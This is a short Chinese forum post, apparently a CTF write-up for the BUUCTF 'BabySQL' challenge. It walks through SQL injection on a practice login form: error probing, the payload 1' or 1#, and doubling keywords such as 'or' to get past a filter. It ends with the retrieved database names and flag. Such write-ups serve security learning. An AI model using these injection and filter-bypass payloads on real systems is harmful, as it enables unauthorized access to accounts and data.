登录后更精彩...O(∩_∩)O...
您需要 登录 才可以下载或查看,没有账号?立即注册
×
BUUCTF靶场15 --[极客大挑战 2019]BabySQL
考点:双写绕过
第一步:用1和1登录,NO,Wrong username password!!!
第二步:用1'和1登录,报Error!
You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right syntax to use near '1'' at line 1
第三步:万能密码1' or 1#登录,报Error!
You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right syntax to use near '1#' and password='1'' at line 1
第四步:万能密码1' or 1#登录,双写or试一下
Login Success!
Hello admin!
Your password is 'f7ab679eb6f88139194a50ab9ee7aa1b'
和前面一样,案例一样,获取flag
库:'information_schema,mysql,performance_schema,test,ctf,geek'
表:ctf库中只有 'Flag'表
列:Flag表中只有一栏'flag'
flag:flag{e08b3c1c-ab14-4793-8c7b-71fd86972b60}
| 
发表于 2022-9-2 15:50:20
